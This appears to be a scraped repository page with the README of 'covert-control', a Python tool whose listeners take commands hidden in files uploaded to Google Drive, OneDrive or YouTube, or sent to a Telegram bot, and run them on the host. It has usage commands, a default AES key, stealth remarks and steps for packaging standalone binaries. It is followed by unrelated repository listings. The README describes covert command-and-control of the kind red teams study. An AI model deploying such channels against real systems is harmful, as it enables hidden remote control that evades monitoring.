Google Drive, OneDrive and Youtube as covert-channels - Control systems remotely by uploading files to Google Drive, OneDrive, Youtube or Telegram

Related tags

Third-party APIs Wrappersyoutubetelegram-botonedrivegoogle-drivecovert-channelcommand-and-control
Overview

covert-control

Control systems remotely by uploading files to Google Drive, OneDrive, Youtube or Telegram using Python to create the files and the listeners. It allows to create text files, images, audio or videos, with the commands in cleartext or encrypted using AES.

  • covert-googledrive.py - Control systems uploading files to a public folder in Google Drive.

  • covert-onedrive.py - Control systems uploading files to a public folder in OneDrive.

  • covert-youtube.py - Control systems uploading videos to Youtube (updated from covert-tube).

  • covert-telegram.py - Control systems with a Telegram bot.

Create files to upload

You can find example files in the folder test_files or create new ones with generate_file.py:

python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]

  • -t (--type) [Required]: Types of file: "text", "image", "audio" or "video".

  • -o (--outputfile) [Optional]: Output file.

  • -c (--command) [Optional]: Command to execute.

  • -e (--encrypted) [Optional]: Add this flag to encrypt the command with AES.

Examples:

python3 generate_file.py -t text  -c "whoami" -o text.txt
python3 generate_file.py -t text  -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e

Configuration

Common configuration values:

  • data_type (Optional. Default: "text"):

    data_type File type Encrypted Valid for Extension
    text Text file No Google Drive, OneDrive .txt
    text_encrypted Text file Yes Google Drive, OneDrive .txt
    image Image No Google Drive, OneDrive .png
    image_encrypted Image Yes Google Drive, OneDrive .png
    audio Audio No Google Drive, OneDrive .wav
    audio_encrypted Audio Yes Google Drive, OneDrive .wav
    video Video No Google Drive, OneDrive, Youtube .avi
    video_encrypted Video Yes Google Drive, OneDrive, Youtube .avi

  • delay_seconds (Optional. Default: 300): Seconds between checks of new files uploaded to the Google Drive or OneDrive folder or new videos in the Youtube channel.

  • aes_key (Optional. Default: "covert-control21"): Key for AES encryption.

  • debug (Optional. Default: True): Print messages and timestamps in the listener or not.

Specific configuration values:

  • googledrive_folder: Url of public Google Drive folder to monitor (for covert-googledrive.py).

  • onedrive_folder: Url of public OneDrive folder to monitor (for covert-onedrive.py).

  • youtube_channel_id: Youtube channel ID of the channel to monitor. You can get it from here (for covert-youtube.py).

  • youtube_api_key: Get an API key creating an application and generating the key in here (for covert-youtube.py).

  • telegram_token: Bot token, create it using BotFather. Write "/newbot", then send a name for the bot (for example, "botname") and a username for the bot ending in "-bot" (for example, "somethingrandombot") (for covert-telegram.py).

  • telegram_username: Specify a Telegram username so it only executes commands received from this user (without "@").

Google Drive

It allows to execute commands uploading text files, images, audio and videos, unencrypted or encrypted with AES. The optional input argument is the public folder url, which can be also configured in config.py:

python3 covert-googledrive.py [FOLDER_URL]

The listener will check the Google Drive folder every 300 seconds by default (can be updated in config.py). In this case a video, "video.avi", is uploaded with the command in the QR of the video:

img1

After finding there is a new file uploaded to the folder, it is downloaded, processed and the commands are executed:

img2

Onedrive

It allows to execute commands uploading text files, images, audio and videos, unencrypted or encrypted with AES. The optional input argument is the public folder url, which can be also configured in config.py:

python3 covert-onedrive.py [FOLDER_URL]

The listener will check the OneDrive folder every 300 seconds by default (this can be updated in config.py). In this case an audio, "audio_encrypted.wav", is uploaded with the command encrypted with AES:

img3

After finding there is a new file uploaded to the folder, it is downloaded, processed and the commands are executed:

img4

NOTE: This will only work if you do not delete any file in the folder, if you do it you must create a new one. It could be possible to implement it to work even after deleting files, but it would be necessary to create many requests and would be less stealthy.

Youtube

It allows to execute commands uploading videos, unencrypted or encrypted with AES. The optional input arguments are the Youtube channel ID to monitor and the API key, which can be also configured in config.py:

python3 covert-youtube.py [CHANNEL_ID] [API_KEY]

The listener will check the Youtube channel every 300 seconds by default (this can be updated in config.py). First the video is uploaded:

img5

After finding there is a new video in the channel, it is downloaded, processed and the commands are executed:

img6

Telegram

Control systems remotely with a Telegram bot. This option does not allow to upload files, but it is possible to send the commands in cleartext ("/cmd") or encrypted with AES ("/encrypted"). The first optional input argument is the bot token, which can be also configured in config.py; the second one is used to configure a single Telegram user who can send commands to the bot (without "@"):

python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]

The listener will check the commands in the chat and show the output:

/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

img7

Installation

sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/

Creating standalone binaries

pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
Owner
Ricardo Ruiz
Ricardo Ruiz
GitHub Repository https://ricardojoserf.github.io/covert-control/
ClearML - Auto-Magical Suite of tools to streamline your ML workflow. Experiment Manager, MLOps and Data-Management

ClearML - Auto-Magical Suite of tools to streamline your ML workflow Experiment Manager, MLOps and Data-Management ClearML Formerly known as Allegro T

ClearML 3.9k Jan 01, 2023
A github actions + python code to extract URLs to code repositories to put into standard form, starting with github

A github actions + python code to extract URLs to code repositories to put into standard form, starting with github ---- NOTE: JUS

Justin Gosses 2 Nov 15, 2021
If you are in allot of groups or channel and you would like to leave them at once use this

Telegram-auto-leave-groups If you are in allot of groups or channel and you would like to leave them at once use this USER GUIDE 👣 Insert your telegr

Julius Njoroge 4 Jan 03, 2023
A BOT TO FIND ID OF A STICKER.

sticker id A BOT TO FIND ID OF A STICKER. THIS REPOSITORY HAVE TWO BRANCHES FOR DEPLOY WITH COMMAND & WITHOUT COMMAND. Mandatory variables API_ID - Ge

Ashik Muhammed 3 Dec 29, 2022
AWS CloudSaga - Simulate security events in AWS

AWS CloudSaga - Simulate security events in AWS AWS CloudSaga is for customers to test security controls and alerts within their Amazon Web Services (

Amazon Web Services - Labs 325 Dec 01, 2022
Coinbase Pro API interface framework and tooling

neutrino This project has just begun. Rudimentary API documentation Installation Prerequisites: Python 3.8+ and Git 2.33+ Navigate into a directory of

Joshua Chen 1 Dec 26, 2021
This is a bitcoin bot that will automatically buy bitcoin if Elon Musk Tweets about it. It is a configurable crypto trading bot that listens to Technoking Musk to express his opinions on Bitcoin and buy as soon as he's tweeted.

DESCRIPTION This bot is designed to buy bitcoin every time Elon musk tweets about bitcoin with the following parameters: The bot will open a buy pos

471 Dec 24, 2022
Discord bot template.py

discord_bot_template.py A minimal and open-source discord.py boilerplate for kick-starting bot projects. I spend a lot of time developing bots for dif

Tarran Prior 1 Feb 24, 2022
The most fresh and updateable Telegram userbot. By one of the most active contibutors to GeekTG

Installation Script installation: Simply run this command out of root: . (wget -qO- http://gg.gg/get_hikka) Manual installation: apt update && apt in

Dan Gazizullin 150 Jan 04, 2023
Twitter bot that finds new friends in Twitter.

PythonTwitterBot Twitter Bot Thats Find New Friends pip install textblob pip install tweepy pip install googletrans check requirements.txt file Env

IbukiYoshida 4 Aug 11, 2021
Unofficial YooMoney API python library

API Yoomoney - unofficial python library This is an unofficial YooMoney API python library. Summary Introduction Features Installation Quick start Acc

Aleksey Korshuk 136 Dec 30, 2022
NewpaperNews-API - Json data of the news with python

NewsAPI API Documentation BASE_URL = "https://saurav.tech/NewsAPI/" top_headline

Aryaman Prakash 2 Sep 23, 2022
REPO USERBOT YANG DIBUAT DARI BERBAGAI REPO USERBOT GITHUB.

Lord Userbot Userbot Yang Digunakan Untuk Bersenang-Senang Di Telegram Repo Lord Userbot Repo Yang Dibuat Alvin Dari Berbagai Repo Userbot Github CARA

Alvin 70 Jan 02, 2023
Telegram File to Link Fastest Bot , also used for movies streaming

Telegram File Stream Bot ! A Telegram bot to stream files to web. Report a Bug | Request Feature About This Bot This bot will give you stream links fo

Avishkar Patil 194 Jan 07, 2023
Personal Discord Python Bot based on Discord.py

Personal Discord bot using the discord.py library by Rapptz

2 Dec 14, 2022
A Discord Self bot written in python

WitheredBot A Discord Self bot written in python Requirement Python = 3.9 How to Configure git clone https://github.com/a-a-a-aa/WitheredBot.git cd W

......... 0 Jan 05, 2023
Discord Auto bumper made in python, just a simple auto bumper that I made.

Discord Auto bumper made in python, just a simple auto bumper that I made.

XPTGR 0 Dec 04, 2021
A simple python discord bot which give you a yogurt brand name, basing on a large database often updated.

YaourtBot A discord simple bot by Lopinosaurus Before using this code : ・Move env file to .env ・Change the channel ID on line 38 of bot.py to your #pi

The only one bunny who can dev. 0 May 09, 2022
Youtube Music Playlist Organizer

Youtube Music Playlist Organizer, a simple Python application that uses ytmusicapi to help user edit their playlists and organize in other playlists.

Bedir Tapkan 1 Oct 24, 2021
Gets instagram public username and returns usefull informations like profilepic(b64), video_urls etc.

InstaSucker Gets instagram public username and returns usefull informations like profilepic(b64), video_urls etc. Information this project contains a

Armin Amiri 5 Apr 30, 2022